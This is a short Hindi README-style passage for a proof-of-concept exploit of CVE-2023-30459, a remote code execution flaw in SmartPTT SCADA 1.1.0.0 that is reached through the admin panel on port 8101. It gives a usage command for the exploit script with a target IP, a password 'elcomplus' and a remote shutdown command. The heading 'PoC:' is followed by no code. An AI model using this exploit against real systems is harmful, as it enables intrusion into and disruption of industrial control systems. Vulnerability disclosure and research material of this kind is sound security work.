
CVE-2023-30459
SmartPTT SCADA 1.1.0.0 रिमोट कोड निष्पादन की अनुमति देता है (जब हमलावर के पास व्यवस्थापक विशेषाधिकार हों) एक दुर्भावनापूर्ण C# स्क्रिप्ट लिखकर और इसे सर्वर पर निष्पादित करके (डिफ़ॉल्ट रूप से पोर्ट 8101 पर व्यवस्थापक नियंत्रण कक्ष में सर्वर सेटिंग्स के माध्यम से)।
उपयोग कैसे करें:
python CVE-2023-30459.py -t 127.0.0.1 -p elcomplus -cmd "shutdown /s /t 30"
PoC:
